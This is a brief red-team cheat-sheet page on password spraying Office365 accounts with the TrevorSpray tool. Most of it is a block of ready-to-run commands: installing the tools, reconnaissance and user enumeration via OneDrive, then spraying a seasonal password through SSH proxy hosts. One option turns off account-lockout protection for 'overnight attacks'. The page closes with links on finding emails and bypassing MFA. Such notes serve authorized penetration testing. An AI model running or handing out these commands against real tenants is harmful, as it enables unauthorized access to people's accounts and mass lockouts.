# Office365

### Password Spraying Office365

#### TrevorSpray

When using TrevorSpray, consider important factors such as the delay. In my experience, setting the delay to around 100 seconds across multiple hosts has not resulted in a delay ever. 

```bash
# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

# Perform recon against a domain
trevorspray --recon $domain

# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3

# Spray with a 10 second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10

# Spray with two robins and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin

# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts
```

### Identifying Emails without OSINT

{% embed url="<https://github.com/blacklanternsecurity/TREVORspray#example-find-valid-usernames-without-osint-d>" %}

### References

{% embed url="<https://www.sprocketsecurity.com/resources/how-to-bypass-mfa-all-day>" %}